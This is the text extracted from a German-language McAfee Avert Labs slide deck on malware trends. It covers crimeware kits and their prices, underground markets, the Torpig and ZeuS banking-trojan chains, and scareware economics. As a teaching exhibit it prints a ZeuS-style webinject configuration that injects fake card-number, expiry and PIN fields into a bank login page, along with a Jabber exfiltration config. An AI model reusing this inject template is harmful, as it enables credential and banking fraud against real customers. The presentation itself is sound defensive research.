April 10, 2023
Malware - ThreatsTrends, Bedrohungen, Entwicklungen
Toralv DirroMcAfee Avert Labs EMEA Security Strategist
April 10, 20232
Aktueller Wetterbericht
April 10, 20233
Weltweit bei den Avert Labs:
• Aktuell $zu_grosse_Zahl unterschiedliche Stücke Malware von Avert Labs identifiziert
• Wir haben aufgehört zu zählen, die alte Methode macht keinen Sinn mehr:
• 50000+ Samples werden täglich analysiert
• 95% und mehr sind Statisch (nicht selbstreplizierend) – Trojaner und Bots
• 90% und mehr sind gepackt/verschlüsselt– “Runtime Packer”
April 10, 20234
Gesamtzahl Samples
Quelle: AV-Test.org
April 10, 20235
Global Malware Vision
(Cumulative)
• Collections: The Great Zoo
Q1-2009: +4.2 million samplesQ2-2009: +4.1 million samples
April 10, 20236
Selbstreplizierende und Statische Malware
0%
10%
20%
30%
40%
50%
60%
70%
80%
90%
100%
1999 2000 2001 2002 2003 2004 2005 2006 2007 2008
April 10, 20237 7
Rootkits werden die Regel, nicht die Ausnahme
Detection Name Total
Backdoor-AWQ 64927W32/Nuwar@MM 16188Downloader-BAI 4213
Backdoor-CKB 1077Backdoor-BAC 834
April 10, 20238
Motivation Gestern
April 10, 20239
Motivation Heute
Source: Chat Interview mit “Dream Coders Team”, den Entwicklern von MPack http://www.robertlemos.com/2007/07/23/mpack-interview-chat-sessions-posted/
April 10, 202310
Today’s Threat Landscape
10
Increase in malware code added from 07 - 08
500%More Malware
Variations
Malware is obfuscated80%
Toolkits & Obfuscation
New malicious website detected60
SecondsWeb 2.0
is the Catalyst!Of all threats are financially
motivated
90%
Active new zombies per month5m Attack Target
Users vs. Machines
April 10, 202311
Öffentliche Handelsplattformen
April 10, 202312
Und das traurige Resultat
April 10, 202313
Der Untergrund Marktplatz
Bank Logons
• A Washington Mutual Bank account in the U.S. with an available balance of $14,400 is priced at 600 euros ($924), while a Citibank UK account with an available balance of 10,044 pounds is priced at 850 euros ($1,310).
• It may appear to be less dangerous to resell access to a bank account rather than to use it directly.
April 10, 202314
Die Tools
April 10, 202315
The Malware Toolkit Marketplace
Crimeware(Author)
Description Pricing
FirePack(Diel)
Web Exploitation Malware KitNote: a Chinese version exists
$3000 (February 2008)$300 (April 2007)
Zupacha, ZeuS and ZUnker($ash)
The ZeuStrojan is able to inject code into login webpage of financial organization to ask personal data and divert them to a remote location. Zupacha is a bot element, and Zunker a C&C.
$1000 for Zupacha,$2000 for Zunker (January 2008)
Adrenaline, an update of Nuclear Grabber(Corpse)
Universal kit for creating tools to capture targeted banking data. Able to intercept and retransmit authentic transactions on the fly between the bank and its client.
$3000
PolySploit, an update of NeoSploit(Grabarz)
Web Exploitation Malware Kit, statistical engine, enhanced configuration capability, exploitation package , enhanced support and online forum for customers.
100 €
El fiesta Web Based and PDF-Exploit Pack used to launch attacks and monitor them. $850 (December 2008)
Turkojan RAT(AlienSoftware)
A Remote Access Tool made in Turkey. Bronze edition: $99 (July 2008)Silver edition: $179Gold edition: $249
ZoPack Web Based PDF-Exploit Pack used to launch attacks and monitor them..
Source: McAfee Avert Labs
15
April 10, 202316
CaaS – Crimeware as a Service
Service Description Prices Encountered
Proxy Rental Botnet networks on a “Per use” (on a monthly basis) or “daily rates” (on a daily basis, over a month) plans.
Daily Limit 50, Qty per Month 1500: $95Per Use Plan, Qty per Month 1000: $69.95
Web Injection Shop HTML injection codes designed to steal information from customers of dozens of financial institutions worldwide. Each HTML injection is specifically tailored to match each bank’s specific website design.
Each between $10 and $30
Spam facilities Spamming tools, mailing lists, etc. 5000/7000 emails per minute, over 1 million emails per day: $2000 per month
Botnet management HTTP Command & Control facilities for ZeuSmalware. $50 per month
Flooding/DDoS Complete paralysis of your competitor by flooding•his stationary or mobile phone•his web site
$80 per 24h
1 hour: $20 ; 1 day: $100Large projects: $200
Source: McAfee Avert Labs
16
April 10, 202317
Passwörter hacken? Wozu??!
April 10, 202318
Shark: Compilable multi system back door Trojan
April 10, 202319
Beispiel einer Konfigurations-Datei
<inject
url="citibank.com"
before="name=password></TD></TR>"
what="
<TR><TD colspan=3 class=smallArial noWrap></TD></TR>
<TR><TD colspan=3 class=smallArial noWrap>
<SPAN STYLE='color:red'>To prevent fraud enter your credit card information please:</SPAN></TD></TR>
<TR><TD colspan=3 class=smallArial noWrap></TD></TR>
<TD noWrap colSpan=2><B>Your ATM or Check Card Number:</B></TD>
<TD class=smallArial noWrap align=right></TD></TR>
<TD class=username colSpan=3><INPUT id=cc type=text maxlength=16 size=16 value='' name=cc></TD></TR>
<TD noWrap colSpan=2><B>Expiration Date:</B></TD>
<TD class=smallArial noWrap align=right>(e.g. 07.2007)</TD></TR>
<TD class=username colSpan=3><INPUT id=expdate type=text maxlength=7 size=7 value='' name=expdate></TD></TR>
<TD noWrap colSpan=2><B>ATM PIN:</B></TD>
<TD class=smallArial noWrap align=right></TD></TR>
<TR>
<TD class=username colSpan=3><INPUT id=pin type=password size=4 maxlength=4 value='' name=pin></TD></TR>
"block="sign-on."
check="pin"
quan="4"
content="d"
>
</inject>
April 10, 20232020
√ΩUser ist auf seiner Bank Webseite
SSL Zertifikat ist valide, Schloss wird angezeigt
Torpig injiziert in den Browser ein Form, das nach zusätzlichen Informationen fragt – im selben Stil wie die Webseite
April 10, 202321
Delivery
April 10, 202322
Email Attachments – nach wie vor häufig
April 10, 202323
Spear Phishing: “Whaling”
“The United States Tax Court has received many telephone calls regarding an e-mail which purports to originate from the Court being sent by a member of the Tax Court’s practitioner bar. This message is an example of “Spear Phishing,” which is an e-mail spoofing attempt that targets a specific organization. The Tax Court is not disseminating any e-mail notice to anyone who currently has a case before this Court.”
April 10, 202324
Web 2.0
Emails werden durch Links in Social Networks ersetzt
April 10, 202325
Koobface vorbei am Contentfilter… Nutzt Vertrauen
April 10, 202326
Autorun Würmer
Weitgehend ignoriert – bis Conficker kam
April 10, 202327
Autorun ist heute ein bedeutender Infektionsweg
April 10, 202328
Anatomie eines Angriffes: Torpig botnet
28
Wird ein Bot
Opfer System
GET/
Web Server mit Sicherheitslücke
1
<iframe>2
Mebroot drive-by-download Server
GET/?gnh5(request JS code)
3
Launches exploitsgnh5.exe downloadedInstalls Mebroot, injects DLL
4
Mebroot C&C server
5
TorpigDLLs injected into IE, Firefox, Outlook, Skype, IM, etc.
6
Torpig C&C server
Gestohlene Daten alle 20 min hochladen
7
Config file containing bank domains, new C&C servers300 domains for target FIs
8
Injection serverURL9
Phishing HTML 10
Alle 2 Stunden
ZeuS - “human” MITM – Step 1
Maintenance, bitte warten…
ZeuS - “human” MITM – Step 2
Zur Sicherheit etwas Mathe…
ZeuS - “human” MITM – Step 3
Sicherheitshalber die Mobiltelefonnummer bitte
ZeuS - “human” MITM – Step 4
Bestätigen mit iTAN 10
ZeuS - “human” MITM – Step 5
Erfolgreich hinzugefügt (wozu auch immer)
ZeuS - “human” MITM – Step 6
Bedauerlicherweise wegen Wartungsarbeiten heute geschlossen
ZeuS - “human” MITM Admin Panel
ZeuS – mit Instant Messaging
ZeuS Jabber Add-on
[im]server=jabber.ruusername=glom***password=qazx*****to=thekl***@jabber.ruto1=icq12***@jabber.ruto2=tank56***@jabber.ru; name=mask; mask [keylist];key1="login="key2="injtoken="key3="inja1="[list];test1=*onlineeast*.bankofamerica.com*
April 10, 202337
Malware / Crimeware
• URLZone• The Trojan calls back to its command and control server for specific
instructions on exactly how much to steal from the victim's bank account without raising any suspicion, and to which money mule account to send it the money. Then it forges the victim's on-screen bank statements so the person and bank don't see the unauthorized transaction.
http://vil.nai.com/vil/content/v_237377.htm (Downloader-BQZ.a)
http://www.darkreading.com/database_security/security/client/showArticle.jhtml?articleID=220300592
37
This statement shows a transaction of 53.94 Euros when actually 8,571.31
Euros was removed from the account. The balance has been changed by the
Trojan.(http://www.geek.com/articles/news/
malware-now-covers-its-tracks-in-bank-statements-20090930/)
April 10, 202338
Is Your Computer Infected(by a Fake Anti-Virus) ?
38
Q1Q2
Q3
April 10, 202339
They Are Popular Because They Work and Look Valid
April 10, 202340
People and Economy behind it
April 10, 202341
April 10, 202342
Good at Crime, clueless about Security
• Goal: Tracking distribution sites
• Discovered: Everything– „Product lists“
– Tech Support Calls
– Project Documentation
– Affiliate Lists
– Sourcecode
– Employee lists
– And much more....
April 10, 202343 43
FOCUS 09Anatomy of a scareware company
http://www.internetnews.com/security/article.php/3842936/McAfee+FOCUS+09+Anatomy+of+a+Scareware+Scam.htm
Using more than 63 gigabytes of information culled from querying the company's own portal servers and other publicly available data, Dirk Kollberg, from McAfee Labs, unearthed some astonishing operational details including the following:
• Innovative Marketing used more than 34 different production servers in less than six months and used as many as six different servers at a time to infect, advertise and sell their illicit wares.
• In one 10-day stretch, the company received more than 4 million download requests, meaning that at least 4 million people tried to buy the worthless applications.
• Internal documents report that the URLs used to hawk the scareware are only valid for 15 minutes, making it all but impossible for federal, state or international law enforcement agencies to yank the offending URLs before they've moved on to new addresses.
• It used multiple customer call centers, including at least one in Poland and one in India, to service unsuspecting customers calling via VoIP connections to buy, remove or question the need for the unnecessary scareware. And, believe it or not, they recorded and saved these bogus customer service calls. More incredibly, 95 percent of callers exited were "happy" when the call concluded.
• Because they needed an extensive network of ISPs to pull off the scam, Innovative Marketing kept detailed spreadsheets with all the ISPs pertinent data including price, location and, most telling, a column that rate the ISPs "abuseability"—essentially an assessment of which ISPs would play ball and not ask questions as they went about their business.
• The company added a whopping 4.5 million order IDs, essentially new purchases, in 11 months last year. With most of the phony applications selling for $39.95, that's more than $180 million in less than a year.
April 10, 202344
Fragen? Mehr Info?
• Read the Avert Labs Security Blog– http://www.avertlabs.com/research/blog
• Listen to the AudioParasitics Podcast– http://www.audioparasitics.com
• Read the Monthly Spam Report– http://www.mcafee.com
• Read the McAfee Quarterly Threat Report– http://www.mcafee.com
• Read the McAfee Security Journal– http://www.mcafee.com
• Watch the Stop H*Commerce Series– http://www.stophcommerce.com